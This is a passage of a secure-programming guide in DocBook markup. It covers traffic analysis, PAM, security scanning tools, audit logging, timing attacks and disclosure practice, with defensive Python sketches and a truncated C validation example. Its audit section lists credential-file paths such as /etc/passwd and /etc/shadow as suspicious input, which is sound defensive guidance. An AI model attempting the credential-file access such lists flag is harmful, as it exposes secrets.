One issue not discussed often enough is the problem of ``traffic analysis.''
|
||
That is, even if messages are encrypted and the encryption is not broken,
|
||
an adversary may learn a great deal just from the encrypted messages.
|
||
For example, if the presidents of two companies start exchanging many
|
||
encrypted email messages, it may suggest that the two companies are
|
||
considering a merger.
|
||
For another example, many SSH implementations have been found to have a
|
||
weakness in exchanging passwords: observers could look at packets and
|
||
determine the length (or length range) of the password, even if they
|
||
couldn't determine the password itself.
|
||
They could also determine other information about the password that
|
||
significantly aided in breaking it.
|
||
<!-- http://lwn.net/2001/0322/a/ssh-analysis.php3 -->
|
||
</para>
|
||
|
||
<para>
|
||
Be sure to not make it possible to solve a problem in parts, and use
|
||
different keys when the trust environment (who is trusted) changes.
|
||
Don't use the same key for too long - after a while, change the session key
|
||
or password so an adversary will have to start over.
|
||
</para>
|
||
|
||
<para>
|
||
Generally you should compress something you'll encrypt - this does
|
||
add a fixed header, which isn't so good, but it eliminates many
|
||
patterns in the rest of the message as well as making the result
|
||
smaller, so it's usually viewed as a ``win'' if compression is likely
|
||
to make the result smaller.
|
||
</para>
|
||
|
||
<para>
|
||
In a related note, if you must create your own communication
|
||
protocol, examine the problems of what's gone on before.
|
||
Classics such as Bellovin [1989]'s review of security problems
|
||
in the TCP/IP protocol suite might help you, as well as
|
||
Bruce Schneier [1998]
|
||
and Mudge's breaking of Microsoft's PPTP implementation and their
|
||
follow-on work.
|
||
Again, be sure to give any new protocol widespread public review, and
|
||
reuse what you can.
|
||
</para>
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
|
||
<sect1 id="use-pam">
|
||
<title>Using PAM</title>
|
||
|
||
<para>
|
||
Pluggable Authentication Modules (PAM) is
|
||
a flexible mechanism for authenticating users.
|
||
Many Unix-like systems support PAM, including
|
||
Solaris, nearly all Linux distributions
|
||
(e.g., Red Hat Linux, Caldera, and Debian as of version 2.2),
|
||
and FreeBSD as of version 3.1.
|
||
By using PAM, your program can be independent of the
|
||
authentication scheme (passwords, SmartCards, etc.).
|
||
Basically, your program calls PAM, which at run-time determines
|
||
which ``authentication modules'' are required by checking the configuration
|
||
set by the local system administrator.
|
||
If you're writing a program that requires authentication (e.g., entering
|
||
a password), you should include support for PAM.
|
||
You can find out more about the Linux-PAM project at
|
||
<ulink
|
||
url="http://www.kernel.org/pub/linux/libs/pam/index.html">http://www.kernel.org/pub/linux/libs/pam/index.html</ulink>.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
|
||
<sect1 id="tools">
|
||
<title>Tools</title>
|
||
|
||
<para>
|
||
Some tools may help you detect security problems before
|
||
you field the result.
|
||
They can't find all such problems, of course, but they can help
|
||
catch problems that would otherwise slip by.
|
||
Here are a few tools, emphasizing open source / free software tools.
|
||
</para>
|
||
|
||
<para>
|
||
One obvious type of tool is a program to examine the source code
|
||
to search for patterns of known potential security problems
|
||
(e.g., calls to library functions in ways that are often the source
|
||
of security vulnerabilities).
|
||
These kinds of programs are called ``source code scanners''.
|
||
Here are a few such tools:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Flawfinder, which I've developed; it's available at
|
||
<ulink url="http://www.dwheeler.com/flawfinder">http://www.dwheeler.com/flawfinder</ulink>.
|
||
Like RATS (described next), this program scans C/C++ source code for common problems,
|
||
and is also licensed under the GPL.
|
||
Unlike RATS, flawfinder is implemented in Python.
|
||
The developers of RATS and Flawfinder have agreed to find a way to
|
||
work together to create a single ``best of breed'' open source program.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
RATS (Rough Auditing Tool for Security)
|
||
from Secure Software Solutions is available at
|
||
<ulink url="http://www.securesw.com/rats">http://www.securesw.com/rats</ulink>.
|
||
This program scans C/C++ source code for common problems, and
|
||
is licensed under the GPL.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
ITS4 from Cigital (formerly Reliable Software Technologies, RST)
|
||
also statically checks C/C++ code.
|
||
It is available free for non-commercial use, including its source code
|
||
and with certain modification and redistribution rights.
|
||
Note that this isn't released as ``open source'' as defined by the
|
||
<ulink url="http://www.opensource.org/osd.html">Open
|
||
Source Definition</ulink> (OSD) -
|
||
in particular, OSD point 6 forbids
|
||
``non-commercial use only'' clauses in open source licenses.
|
||
ITS4 is available at
|
||
<ulink url="http://www.rstcorp.com/its4">http://www.rstcorp.com/its4</ulink>.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Splint (formerly named LCLint) is a tool for statically checking C programs.
|
||
With minimal effort, splint can be used as a better lint.
|
||
If additional effort is invested adding annotations to programs,
|
||
splint can perform stronger checking than can be done by any standard lint.
|
||
For example, it can be used to statically detect likely buffer overflows.
|
||
The software is licensed under the GPL and is available at
|
||
<ulink url="http://www.splint.org">http://www.splint.org</ulink>.
|
||
<!-- <ulink url="http://lclint.cs.virginia.edu">http://lclint.cs.virginia.edu</ulink>.
|
||
-->
|
||
</para></listitem>
|
||
<listitem><para>
|
||
cqual is a type-based analysis tool for finding bugs in C programs. cqual
|
||
extends the type system of C with extra user-defined type qualifiers,
|
||
e.g., it can note that values are ``tainted'' or ``untainted''
|
||
(similar to Perl's taint checking). The
|
||
programmer annotates their program in a few places, and cqual performs
|
||
qualifier inference to check whether the annotations are correct. cqual
|
||
presents the analysis results using Program Analysis Mode, an emacs-based
|
||
interface.
|
||
The current version of cqual can detect potential format-string
|
||
vulnerabilities in C programs.
|
||
A previous incarnation of cqual, Carillon,
|
||
has been used to find Y2K bugs in C programs.
|
||
The software is licensed under the GPL and is available from
|
||
<ulink url="http://www.cs.berkeley.edu/Research/Aiken/cqual">http://www.cs.berkeley.edu/Research/Aiken/cqual</ulink>.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Cyclone is a C-like language intended to remove C's security weaknesses.
|
||
In theory, you can always switch to a language that is ``more secure,''
|
||
but this doesn't always help (a language can help you avoid common mistakes
|
||
but it can't read your mind).
|
||
<ulink url="http://www.securityfocus.com/guest/9094">John Viega has
|
||
reviewed Cyclone</ulink>, and in December 2001 he said:
|
||
``Cyclone is definitely a neat language.
|
||
It's a C dialect that doesn't feel like it's taking away any power,
|
||
yet adds strong safety guarantees, along with numerous features that
|
||
can be a real boon to programmers.
|
||
Unfortunately, Cyclone isn't yet ready for prime time.
|
||
Even with crippling limitations aside, it doesn't yet offer
|
||
enough advantages over Java (or even C with a good set of tools)
|
||
to make it worth the risk of using what is still a very young technology.
|
||
Perhaps in a few years, Cyclone will mature into a robust,
|
||
widely supported language that comes dangerously
|
||
close to C in terms of efficiency.
|
||
If that day comes, you'll certainly see me abandoning C for good.''
|
||
The Cyclone compiler has been released under the GPL and LGPL.
|
||
You can get more information from the
|
||
<ulink url="http://www.research.att.com/projects/cyclone">
|
||
Cyclone web site</ulink>.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
<para>
|
||
Some tools try to detect potential security flaws at run-time,
|
||
either to counter them or at least to warn the developer about them.
|
||
Much of Crispin Cowan's work, such as StackGuard, fits here.
|
||
</para>
|
||
|
||
<para>
|
||
There are several tools that try to detect various C/C++ memory-management
|
||
problems; these are really general-purpose software quality improvement
|
||
tools, and not specific to security, but memory management problems
|
||
can definitely cause security problems.
|
||
An especially capable tool is
|
||
<ulink url="http://developer.kde.org/~sewardj">Valgrind</ulink>,
|
||
which detects various memory-management problems
|
||
(such as use of uninitialized memory, reading/writing memory after it's been
|
||
free'd, reading/writing off the end of malloc'ed blocks,
|
||
and memory leaks).
|
||
Another such tool is Electric Fence (efence) by Bruce Perens, which can
|
||
detect certain memory management errors.
|
||
<ulink url="http://www.linkdata.se/sourcecode.html">Memwatch</ulink>
|
||
(public domain) and
|
||
<ulink url="http://odin.ac.hmc.edu/~neldredge/yamd/">YAMD</ulink> (GPL)
|
||
can detect memory allocation problems for C and C++.
|
||
You can even use the built-in capabilities of the
|
||
GNU C library's malloc library, which has the
|
||
MALLOC_CHECK_ environment variable (see its manual page for more information).
|
||
There are many others.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
Another approach is to create test patterns and run the program,
|
||
in an attempt to find weaknesses in the program.
|
||
Here are a few such tools:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
BFBTester, the Brute Force Binary Tester, is licensed under the GPL.
|
||
This program does quick security checks of binary programs.
|
||
BFBTester performs checks of single and multiple argument
|
||
command line overflows and environment variable overflows.
|
||
Version 2.0 and higher can also watch for tempfile creation activity
|
||
(to check for using unsafe tempfile names).
|
||
At one time BFBTester didn't run on Linux (due to
|
||
a technical issue in Linux's POSIX threads implementation), but this
|
||
has been fixed as of version 2.0.1.
|
||
More information is available at
|
||
<ulink url="http://bfbtester.sourceforge.net/">http://bfbtester.sourceforge.net/</ulink>
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
The
|
||
<ulink url="http://fuzz.sourceforge.net">fuzz</ulink>
|
||
program
|
||
is a tool for testing other software.
|
||
It tests programs by bombarding the program being evaluated with random data.
|
||
This tool isn't really specific to security.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
<ulink url="http://www.immunitysec.com/spike.html">SPIKE</ulink>
|
||
is a "fuzzer creation kit", i.e., it's a toolkit designed to
|
||
create "random" tests to find security problems.
|
||
The SPIKE toolkit is particularly designed for protocol analysis by
|
||
simulating network protocol clients, and SPIKE proXy is a tool built on
|
||
SPIKE to test web applications.
|
||
SPIKE includes a few pre-canned tests.
|
||
SPIKE is licensed under the GPL.
|
||
</para></listitem>
|
||
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
<para>
|
||
There are a number of tools that try to give you insight into running
|
||
programs that can also be useful when trying to find security problems
|
||
in your code.
|
||
This includes symbolic debuggers (such as gdb) and trace programs
|
||
(such as strace and ltrace).
|
||
One interesting program to support analysis of running code is
|
||
<ulink url="http://razor.bindview.com/tools/fenris">
|
||
Fenris</ulink> (GPL license).
|
||
Its documentation describes Fenris as a
|
||
``multipurpose tracer, stateful analyzer and partial decompiler
|
||
intended to simplify bug tracking,
|
||
security audits, code, algorithm or protocol analysis -
|
||
providing a structural program trace, general information
|
||
about internal constructions, execution path,
|
||
memory operations, I/O, conditional expressions and much more.''
|
||
Fenris actually supplies a whole suite of tools, including
|
||
extensive forensics capabilities and
|
||
<ulink url="http://lcamtuf.coredump.cx/fdesk.jpg">a
|
||
nice debugging GUI for Linux</ulink>.
|
||
A list of other promising open source tools that can be suitable
|
||
for debugging or code analysis is available at
|
||
<!-- was: http://lcamtuf.coredump.cx/fenris/other.txt -->
|
||
<ulink url="http://lcamtuf.coredump.cx/fenris/debug-tools.html">
|
||
http://lcamtuf.coredump.cx/fenris/debug-tools.html</ulink>.
|
||
Another interesting program along these lines is Subterfugue,
|
||
which allows you to control what happens in every system call made
|
||
by a program.
|
||
</para>
|
||
|
||
<para>
|
||
If you're building a common kind of product where many standard
|
||
potential flaws exist (like an ftp server or firewall), you might
|
||
find standard security scanning tools useful.
|
||
One good one is
|
||
<ulink url="http://www.nessus.org">Nessus</ulink>; there are many others.
|
||
These kinds of tools are very useful for doing regression testing,
|
||
but since they essentially use a list of past specific vulnerabilities
|
||
and common configuration errors,
|
||
they may not be very helpful in finding problems in new programs.
|
||
</para>
|
||
|
||
<para>
|
||
Often, you'll need to call on other tools to implement your secure
|
||
infrastructure.
|
||
The
|
||
<ulink url="http://ospkibook.sourceforge.net">
|
||
Open-Source PKI Book</ulink>
|
||
describes a number of open source programs for
|
||
implementing a public key infrastructure (PKI).
|
||
</para>
|
||
|
||
<para>
|
||
Of course, running a ``secure'' program on an insecure platform
|
||
configuration makes little sense.
|
||
You may want to examine hardening systems, which attempt to configure
|
||
or modify systems to be more resistant to attacks.
|
||
For Linux, one hardening system is
|
||
Bastille Linux, available at
|
||
<ulink url="http://www.bastille-linux.org">http://www.bastille-linux.org</ulink>.
|
||
</para>
|
||
|
||
|
||
</sect1>
|
||
<sect1 id="windows-ce">
|
||
<title>Windows CE</title>
|
||
|
||
<para>
|
||
If you're securing a Windows CE Device, you should read
|
||
Maricia Alforque's
|
||
"Creating a Secure Windows CE Device" at
|
||
<ulink url="http://msdn.microsoft.com/library/techart/winsecurity.htm">http://msdn.microsoft.com/library/techart/winsecurity.htm</ulink>.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="write-audit-records">
|
||
<title>Write Audit Records</title>
|
||
|
||
<para>
|
||
Write audit logs for program startup, session startup, and
|
||
for suspicious activity.
|
||
Possible information of value includes date, time, uid, euid, gid, egid,
|
||
terminal information, process id, and command line values.
|
||
You may find the function syslog(3) helpful for implementing audit logs.
|
||
One awkward problem is that any logging system should be able to record
|
||
a lot of information (since this information could be very helpful), yet
|
||
if the information isn't handled carefully the information itself could be
|
||
used to create an attack.
|
||
After all, the attacker controls some of the input being sent to the program.
|
||
When recording data sent by a possible attacker,
|
||
identify a list of ``expected'' characters and
|
||
escape any ``unexpected'' characters so that the log isn't corrupted.
|
||
Not doing this can be a real problem; users may include characters
|
||
such as control characters (especially NIL or end-of-line) that
|
||
can cause real problems.
|
||
For example, if an attacker embeds a newline, they can then forge
|
||
log entries by following the newline with the desired log entry.
|
||
Sadly, there doesn't seem to be a standard convention for escaping these
|
||
characters.
|
||
I'm partial to the URL escaping mechanism
|
||
(%hh where hh is the hexadecimal value of the escaped byte) but there
|
||
are others including the C convention (\ooo for the octal value and \X
|
||
where X is a special symbol, e.g., \n for newline).
|
||
There's also the caret-system (^I is control-I), though that doesn't
|
||
handle byte values over 127 gracefully.
|
||
</para>
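<para>
A minimal Python sketch of the URL-style (%hh) escaping described above follows.
The function name escape_for_log and the particular choice of ``expected''
characters (printable ASCII other than '%') are assumptions made for
illustration; a real program should choose its own list.
</para>

```python
import string

# Assumption: "expected" bytes are printable ASCII (letters, digits,
# punctuation, space), except '%' itself, which must be escaped so that
# the escaped form can be decoded unambiguously.
EXPECTED = set(
    (string.ascii_letters + string.digits + string.punctuation + " ").encode("ascii")
) - {ord("%")}


def escape_for_log(raw: bytes) -> str:
    """Return `raw` with every unexpected byte written as %hh (hexadecimal).

    `escape_for_log` is a hypothetical helper, not a standard function.
    """
    return "".join(chr(b) if b in EXPECTED else f"%{b:02X}" for b in raw)


if __name__ == "__main__":
    # An attacker-supplied user name that tries to forge a second log entry.
    hostile = b"bob\nJan  1 00:00:00 host login: root logged in"
    print("failed login for user:", escape_for_log(hostile))
```

<para>
Since the embedded newline is written as %0A, the forged entry stays on the
same log line as the real one.
The escaped string could then be handed to syslog(3) or a similar facility.
</para>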
|
||
|
||
<para>
|
||
There is the danger that a user could create a denial-of-service attack
|
||
(or at least stop auditing)
|
||
by performing a very large number of events that cut an audit record until
|
||
the system runs out of resources to store the records.
|
||
One approach to counter this threat is to rate-limit audit record
|
||
recording; intentionally slow down the response rate
|
||
if ``too many'' audit records are being cut.
|
||
You could try to slow the response rate only to the suspected attacker,
|
||
but in many
|
||
situations a single attacker can masquerade as potentially many users.
|
||
</para>
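<para>
One way to rate-limit audit records is a token bucket, sketched below in Python.
The class name AuditRateLimiter, its parameters, and the injectable clock are
all hypothetical choices made for this example; the technique shown is an
ordinary token bucket, not something prescribed by this book.
</para>

```python
import time


class AuditRateLimiter:
    """Token bucket: each audit record spends one token; tokens refill over time.

    Illustrative sketch. `rate_per_sec` and `burst` are tuning assumptions.
    """

    def __init__(self, rate_per_sec: float, burst: int, clock=time.monotonic):
        self.rate = rate_per_sec
        self.burst = burst
        self.tokens = float(burst)
        self.clock = clock
        self.last = clock()

    def delay_before_next(self) -> float:
        """Spend one token and return how long the response should be delayed."""
        now = self.clock()
        # Refill for the time that has passed, but never beyond the burst size.
        self.tokens = min(self.burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        self.tokens -= 1.0
        if self.tokens >= 0:
            return 0.0
        # The bucket is overdrawn: wait until the debt would be repaid.
        return -self.tokens / self.rate


if __name__ == "__main__":
    limiter = AuditRateLimiter(rate_per_sec=5.0, burst=10)
    for i in range(15):
        delay = limiter.delay_before_next()
        time.sleep(delay)  # slow the response instead of dropping the record
        print(f"audit record {i} written after {delay:.2f}s delay")
```

<para>
Normal bursts of activity are unaffected, while a flood of events is slowed
to the configured rate instead of exhausting storage.
</para>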
|
||
|
||
<para>
|
||
Selecting what is ``suspicious activity'' is, of course, dependent on
|
||
what the program does and its anticipated use.
|
||
Any input that fails the filtering checks discussed earlier is
|
||
certainly a candidate (e.g., containing NIL).
|
||
Inputs that could not result from normal use should probably be logged,
|
||
e.g., a CGI program where certain required fields are missing
|
||
in suspicious ways.
|
||
Any input with phrases like /etc/passwd or /etc/shadow
|
||
or the like is very suspicious in many cases.
|
||
Similarly, trying to access Windows ``registry'' files or .pwl files
|
||
is very suspicious.
|
||
</para>
|
||
|
||
<para>
|
||
Do not record passwords in an audit record.
|
||
Often people accidentally enter passwords for a different system,
|
||
so recording a password may allow a system administrator to break into a
|
||
different computer outside the administrator's domain.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="physical-emissions">
|
||
<title>Physical Emissions</title>
|
||
<para>
|
||
Although it's really outside the scope of this book, it's
|
||
important to remember that computing and communications equipment leaks a lot
|
||
of information, which makes it hard to really secure.
|
||
Many people are aware of TEMPEST requirements which deal with
|
||
radio frequency emissions of computers, displays, keyboards, and other
|
||
components which can be eavesdropped.
|
||
The light from displays can also be eavesdropped, even if it's bounced off an
|
||
office wall at great distance
|
||
[Kuhn 2002].
|
||
Modem lights are also enough to determine the underlying communication.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="miscellaneous">
|
||
<title>Miscellaneous</title>
|
||
|
||
<para>
|
||
The following are miscellaneous security guidelines that I couldn't
|
||
seem to fit anywhere else:
|
||
</para>
|
||
|
||
<para>
|
||
Have your program check at least some of its assumptions before it uses them
|
||
(e.g., at the beginning of the program).
|
||
For example, if you depend on the ``sticky'' bit being set on a given
|
||
directory, test it; such tests take little time and could prevent
|
||
a serious problem.
|
||
If you worry about the execution time of some tests on each call, at least
|
||
perform the test at installation time, or even better at least
|
||
perform the test on application start-up.
|
||
</para>
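<para>
The sticky-bit test mentioned above might look like this in Python.
The function name require_sticky_dir is hypothetical, and the demonstration
uses a freshly created temporary directory rather than any real system path.
</para>

```python
import os
import stat
import tempfile


def require_sticky_dir(path: str) -> None:
    """Raise RuntimeError unless `path` is a directory with the sticky bit set.

    Hypothetical start-up check; os.stat follows symbolic links.
    """
    mode = os.stat(path).st_mode
    if not stat.S_ISDIR(mode):
        raise RuntimeError(f"{path} is not a directory")
    if not mode & stat.S_ISVTX:
        raise RuntimeError(f"{path} does not have the sticky bit set")


if __name__ == "__main__":
    demo = tempfile.mkdtemp()
    os.chmod(demo, 0o1777)  # world-writable with the sticky bit, like /tmp
    require_sticky_dir(demo)
    print("sticky bit present on", demo)
    os.rmdir(demo)
```

<para>
Calling such a check once at start-up costs a single stat(2) call.
</para>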
|
||
|
||
<para>
|
||
If you have a built-in scripting language, it may be possible for the
|
||
language to set an environment variable which adversely affects the
|
||
program invoking the script.
|
||
Defend against this.
|
||
</para>
|
||
|
||
<para>
|
||
If you need a complex configuration language,
|
||
make sure the language has a comment
|
||
character and include a number of commented-out secure examples.
|
||
Often '#' is used for commenting, meaning ``the rest
|
||
of this line is a comment''.
|
||
</para>
|
||
|
||
<para>
|
||
If possible, don't create setuid or setgid root programs;
|
||
make the user log in as root instead.
|
||
</para>
|
||
|
||
<para>
|
||
Sign your code. That way, others can check to see if what's available
|
||
was what was sent.
|
||
</para>
|
||
|
||
<para>
|
||
In some applications you may need to worry about timing attacks,
|
||
where the variation in timing or CPU utilization is enough to give
|
||
away important information.
|
||
This kind of attack has been used to obtain keying information from
|
||
Smartcards, for example.
|
||
Mauro Lacy has
|
||
published a paper titled
|
||
<ulink url="http://maurol.com.ar/security/RTT.pdf">Remote Timing Techniques</ulink>,
|
||
showing that you can (in some cases) determine over the Internet
|
||
whether or not a given user id exists, simply from the effort expended
|
||
by the CPU
|
||
(which can be detected remotely using techniques described in the paper).
|
||
The only way to deal with these sorts of problems is to make sure that
|
||
the same effort is performed even when it isn't necessary.
|
||
The problem is that in some cases this may make the system more vulnerable
|
||
to a denial of service attack, since it can't optimize away unnecessary work.
|
||
</para>
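<para>
The idea of performing the same effort even when it isn't necessary can be
sketched in Python as follows.
Everything here is an assumption made for illustration: the names
hash_password and check_login, the in-memory user table, and the use of
PBKDF2 with the iteration count shown.
This reduces one obvious timing difference; it does not claim to remove
every timing channel.
</para>

```python
import hashlib
import hmac
import os

ITERATIONS = 100_000  # assumed work factor, chosen only for this sketch


def hash_password(password: str, salt: bytes) -> bytes:
    """Derive a password hash with PBKDF2-HMAC-SHA256 (illustrative choice)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


# A dummy record, used so that unknown user ids cost the same work as known ones.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = hash_password("dummy", _DUMMY_SALT)


def check_login(users: dict, user: str, password: str) -> bool:
    """Check a password, doing the expensive hash whether or not `user` exists."""
    salt, stored = users.get(user, (_DUMMY_SALT, _DUMMY_HASH))
    candidate = hash_password(password, salt)
    # compare_digest avoids stopping at the first differing byte.
    matches = hmac.compare_digest(candidate, stored)
    return matches and user in users


if __name__ == "__main__":
    salt = os.urandom(16)
    users = {"alice": (salt, hash_password("s3cret", salt))}
    print(check_login(users, "alice", "s3cret"))
    print(check_login(users, "alice", "wrong"))
    print(check_login(users, "mallory", "guess"))
```

<para>
As noted above, the price is that every failed attempt now costs a full
hash computation, which an attacker can exploit to consume CPU time.
</para>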
|
||
|
||
<para>
|
||
Consider statically linking secure programs.
|
||
This counters attacks on the dynamic link library mechanism
|
||
by making sure that the secure programs don't use it.
|
||
There are several downsides to this, however.
|
||
This is likely to increase disk and memory use (from multiple copies of the
|
||
same routines).
|
||
Even worse, it makes updating of libraries
|
||
(e.g., for security vulnerabilities) more difficult - in most systems
|
||
they won't be automatically updated and have to be tracked and
|
||
implemented separately.
|
||
</para>
|
||
|
||
<para>
|
||
When reading over code, consider all the cases where a match is not made.
|
||
For example, if there is a switch statement, what happens when none of the
|
||
cases match?
|
||
If there is an ``if'' statement, what happens when the condition is false?
|
||
</para>
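<para>
As a small illustration of handling the case where nothing matches,
the Python sketch below rejects any action it doesn't recognize
instead of silently falling through.
The function required_role and the action and role names are hypothetical.
</para>

```python
def required_role(action: str) -> str:
    """Map a requested action to the role needed to perform it.

    Hypothetical example; the actions and roles are placeholders.
    """
    if action == "read":
        return "viewer"
    elif action == "write":
        return "editor"
    elif action == "delete":
        return "admin"
    else:
        # No case matched: fail safe by refusing, rather than returning
        # None or some default role by accident.
        raise ValueError(f"unrecognized action: {action!r}")


if __name__ == "__main__":
    print(required_role("write"))
    try:
        required_role("chmod")
    except ValueError as err:
        print("rejected:", err)
```

<para>
Without the final branch, the function would return None for an unknown
action, and a caller comparing roles might treat that as ``no role required''.
</para>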
|
||
|
||
<para>
|
||
Merely ``removing'' a file doesn't eliminate the file's data from a disk;
|
||
on most systems this simply marks the content as ``deleted'' and makes it
|
||
eligible for later reuse, and often data is at least temporarily stored
|
||
in other places (such as memory, swap files, and temporary files).
|
||
Indeed, against a determined attacker, writing over the data isn't enough.
|
||
A classic paper on the problems of erasing magnetic media is
|
||
Peter Gutmann's paper
|
||
<ulink url="http://www-tac.cisco.com/Support_Library/field_alerts/fn13070.html">
|
||
``Secure Deletion of Data from Magnetic and Solid-State Memory''</ulink>.
|
||
A determined adversary can use other means, too, such as monitoring
|
||
electromagnetic emissions from computers (military systems have to obey
|
||
TEMPEST rules to overcome this)
|
||
and/or surreptitious attacks (such as monitors hidden in keyboards).
|
||
</para>
|
||
|
||
<para>
|
||
When fixing a security vulnerability,
|
||
consider adding a ``warning'' to detect and log an attempt to
|
||
exploit the (now fixed) vulnerability.
|
||
This will reduce the likelihood of an attack, especially if there's
|
||
no way for an attacker to predetermine if the attack will work,
|
||
since it exposes an attack in progress.
|
||
In short, it turns a vulnerability into an intrusion detection system.
|
||
This also suggests that exposing the version of a server program
|
||
before authentication is usually a bad idea for security, since doing so
|
||
makes it easy for an attacker to only use attacks that would work.
|
||
Some programs make it possible for users to intentionally ``lie'' about their
|
||
version, so that attackers will use the ``wrong attacks'' and be detected.
|
||
Also, if the vulnerability can be triggered over a network, please make
|
||
sure that security scanners can detect the vulnerability.
|
||
I suggest contacting Nessus
|
||
(<ulink url="http://www.nessus.org">http://www.nessus.org</ulink>)
|
||
and making sure that their open source security scanner can detect the
|
||
problem.
|
||
That way, users who don't check their software for upgrades
|
||
will at least learn about the problem during their security vulnerability
|
||
scans (if they do them as they should).
|
||
</para>
|
||
|
||
<para>
|
||
Always include in your documentation contact information for
|
||
where to report security problems.
|
||
You should also support at least one of the common email addresses
|
||
for reporting security problems
|
||
(security-alert@SITE, secure@SITE, or security@SITE);
|
||
it's often good to have support@SITE and info@SITE working as well.
|
||
Be prepared to support industry practices by those who have a security
|
||
flaw to report, such as the
|
||
<ulink url="http://www.wiretrip.net/rfp/policy.html">
|
||
Full Disclosure Policy (RFPolicy)
|
||
</ulink>
|
||
and the IETF Internet draft,
|
||
``Responsible Vulnerability Disclosure Process''.
|
||
<!--
|
||
http://www.ietf.org/internet-drafts/draft-christey-wysopal-vuln-disclosure-00.txt
|
||
http://slashdot.org/article.pl?sid=02/02/21/0559238&mode=thread&tid=9.4
|
||
-->
|
||
It's important to quickly work with anyone who
|
||
is reporting a security flaw; remember that they are doing you a favor
|
||
by reporting the problem to you, and that they are under no obligation
|
||
to do so.
|
||
It's especially important, once the problem is fixed, to give proper credit
|
||
to the reporter of the flaw (unless they ask otherwise).
|
||
Many reporters provide the information solely to gain the credit,
|
||
and it's generally accepted that credit is owed to the reporter.
|
||
Some vendors argue that people should never report vulnerabilities to the
|
||
public; the problem with this argument is that this was once common, and the
|
||
result was vendors who denied vulnerabilities while their customers were
|
||
getting constantly subverted for years at a time.
|
||
</para>
|
||
|
||
<!-- ??? maybe someday add Logging discussion -->
|
||
|
||
<para>
|
||
Follow best practices and common conventions when leading a
|
||
software development project.
|
||
If you are leading an open source software / free software project,
|
||
some useful guidelines can be found in
|
||
<ulink url="http://www.tldp.org/HOWTO/Software-Proj-Mgmt-HOWTO/index.html">
|
||
Free Software Project Management HOWTO</ulink> and
|
||
<ulink url="http://www.tldp.org/HOWTO/Software-Release-Practice-HOWTO/index.html">
|
||
Software Release Practice HOWTO</ulink>;
|
||
you should also read
|
||
<ulink url="http://www.catb.org/~esr/writings/cathedral-bazaar">
|
||
The Cathedral and the Bazaar</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
Every once in a while, review security guidelines like this one.
|
||
At least re-read the conclusions in <xref linkend="conclusion">,
|
||
and feel free to go back to the introduction
|
||
(<xref linkend="introduction">) and start again!
|
||
</para>
|
||
|
||
|
||
</sect1>
|
||
|
||
|
||
</chapter>
|
||
|
||
|
||
<chapter id="conclusion">
|
||
<title>Conclusion</title>
|
||
|
||
<epigraph>
|
||
<attribution>Ecclesiastes 7:8 (NIV)</attribution>
|
||
<para>
|
||
The end of a matter is better than its beginning, and
|
||
patience is better than pride.
|
||
</para>
|
||
</epigraph>
|
||
|
||
<para>
|
||
Designing and implementing a truly secure program
|
||
is a difficult task on Unix-like systems such as Linux.
|
||
The difficulty is that a truly secure program must respond
|
||
appropriately to all possible inputs and environments
|
||
controlled by a potentially hostile user.
|
||
Developers of secure programs must deeply understand their platform,
|
||
seek and use guidelines (such as these), and then use assurance
|
||
processes (such as inspections and other peer review techniques)
|
||
to reduce their programs' vulnerabilities.
|
||
</para>
|
||
|
||
<para>
|
||
In conclusion, here are some of the key guidelines in this book:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
Validate all your inputs, including command line inputs,
|
||
environment variables, CGI inputs, and so on.
|
||
Don't just reject ``bad'' input; define what is an ``acceptable'' input
|
||
and reject anything that doesn't match.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Avoid buffer overflow.
|
||
Make sure that long inputs (and long intermediate data values) can't
|
||
be used to take over your program.
|
||
This is the primary programmatic error at this time.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Structure program internals.
|
||
Secure the interface, minimize privileges, make the initial configuration
|
||
and defaults safe, and fail safe.
|
||
Avoid race conditions (e.g., by safely opening any files in a shared
|
||
directory like /tmp).
|
||
Trust only trustworthy channels
|
||
(e.g., most servers must not trust their clients for security checks or
|
||
other sensitive data such as an item's price in a purchase).
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Carefully call out to other resources.
|
||
Limit the values you pass to them to valid values (in particular be concerned about
|
||
metacharacters), and check all system call return values.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
Send information back judiciously.
|
||
In particular, minimize feedback, and handle full or unresponsive output
|
||
to an untrusted user.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
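<para>
The first guideline above, accepting only input that matches a definition
of what is acceptable, can be sketched in C as follows.
This is a minimal illustration rather than code from this book:
the function name <function>is_acceptable_name</function>,
the allowed character set, and the length limit
<literal>MAX_NAME_LEN</literal> are hypothetical choices made for the example,
and a real program would define what is acceptable for each of its own inputs.
</para>

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical limit chosen for this illustration only. */
#define MAX_NAME_LEN 32

/*
 * Return true only if s is between 1 and MAX_NAME_LEN characters long
 * and every character is in the explicitly allowed set.
 * Anything else (NULL, empty, too long, or containing any other
 * character, including shell metacharacters) is rejected.
 */
bool is_acceptable_name(const char *s)
{
    /* The allowlist: assumed here to be ASCII letters, digits, '_' and '-'. */
    static const char allowed[] =
        "abcdefghijklmnopqrstuvwxyz"
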